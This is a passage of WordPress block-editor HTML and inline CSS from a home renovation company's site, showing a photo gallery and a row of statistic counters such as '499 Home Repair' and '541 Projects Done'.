alt=\"\" class=\"wp-image-440\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":441,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18057957_1641106209237147_2139335743547445839_n.jpg\" alt=\"\" class=\"wp-image-441\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a9bea998-7d0c-4e4b-928d-b108fd7a7c6d\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"44ecaf20-952d-4f7f-81b7-7317b0c6079a\"} -->\n<style type=\"text/css\"> .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-44ecaf20-952d-4f7f-81b7-7317b0c6079a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b\"} -->\n<style type=\"text/css\"> .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"a821e40c-d9db-4df8-a874-ba207b78e2ab\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Repair</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"40e7f1d9-3bdc-4663-8f6e-103dd744774b\"} -->\n<style type=\"text/css\"> .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-40e7f1d9-3bdc-4663-8f6e-103dd744774b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"96825ed7-add1-4702-868f-b0437418bf4e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"3c19c43e-2a66-4e93-bc55-5b7f00e5a678\"} -->\n<style type=\"text/css\"> .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"719d3f20-fd00-4b93-8eb7-4c264d4c712b\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n 